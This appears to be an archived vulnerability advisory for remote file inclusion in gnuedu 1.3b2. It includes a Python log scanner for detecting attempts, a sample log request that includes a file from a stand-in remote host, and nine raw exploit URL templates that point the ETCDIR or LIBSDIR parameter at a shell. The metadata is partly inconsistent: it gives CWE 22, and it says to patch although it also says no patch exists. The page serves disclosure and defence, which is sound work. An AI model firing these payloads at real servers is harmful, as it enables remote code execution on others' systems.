vendor: gnuedu
by: GolD_M = [Mahmood_ali]
CVSS: 5.5 (MEDIUM)
Type: Remote File Inclusion
CWE: 22
Product Name: gnuedu
Affected Version From: 1.3b2
Affected Version To: 1.3b2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities

The gnuedu 1.3b2 software is vulnerable to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by including a remote file in the affected script, which can lead to remote code execution.

Mitigation:

Apply the latest patches and updates from the vendor. Restrict access to the affected scripts to trusted IP addresses. Regularly monitor and review logs for any suspicious activity.
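
For the log review recommended above, the following added example (not part of the original advisory or of gnuedu) scans web server access logs for requests that set the listed directory parameters on the listed scripts. It assumes Combined Log Format and that legitimate traffic never supplies ETCDIR or LIBSDIR in the query string; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script suffixes and parameter names copied from the advisory on this page.
WATCHED = {
    "/libs/lom.php": "ETCDIR", "/scripts/lom_update.php": "ETCDIR",
    "/scripts/check-lom.php": "ETCDIR", "/scripts/weigh_keywords.php": "ETCDIR",
    "/web/lom.php": "ETCDIR", "/web/logout.php": "LIBSDIR",
    "/web/help.php": "LIBSDIR", "/web/index.php": "LIBSDIR",
    "/web/login.php": "LIBSDIR",
}
# Combined Log Format: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# A directory variable has no reason to start with a URL scheme, "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)

def find_rfi_attempts(lines):
    """Return (client, path, param, status, remote) for each request that sets
    a listed directory parameter on a listed script. `remote` is True when the
    percent-decoded value begins with a URL scheme, "//" or a UNC prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, target, status = m.groups()
        url = urlsplit(target)
        for suffix, param in WATCHED.items():
            if not url.path.endswith(suffix):
                continue
            # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name == param:
                    hits.append((client, url.path, param, status,
                                 bool(REMOTE_RE.match(value))))
    return hits

# Constructed sample lines (documentation addresses, example.invalid host).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/May/2007:10:01:02 +0000] "GET /gnuedu/web/index.php'
    '?LIBSDIR=http%3A%2F%2Fexample.invalid%2Fx%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/May/2007:10:01:05 +0000] "GET /gnuedu/libs/lom.php'
    '?ETCDIR=/tmp/ HTTP/1.1" 404 310',
    '192.0.2.10 - - [08/May/2007:10:02:00 +0000] "GET /gnuedu/web/index.php'
    '?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Hits with `remote` set to True and a 200 status are the ones to triage first; the status code alone does not show whether an include succeeded.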

Exploit-DB raw data:

# gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://gnuedu.ofset.org/download/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/libs/lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/lom_update.php?ETCDIR=Shell
# Exploit:[Path]/scripts/check-lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/weigh_keywords.php?ETCDIR=Shell
# Exploit:[Path]/web/logout.php?LIBSDIR=Shell
# Exploit:[Path]/web/help.php?LIBSDIR=Shell
# Exploit:[Path]/web/index.php?LIBSDIR=Shell
# Exploit:[Path]/web/login.php?LIBSDIR=Shell
# Exploit:[Path]/web/lom.php?ETCDIR=Shell
# Greetz To: Tryag-Team ....**

# milw0rm.com [2007-05-08]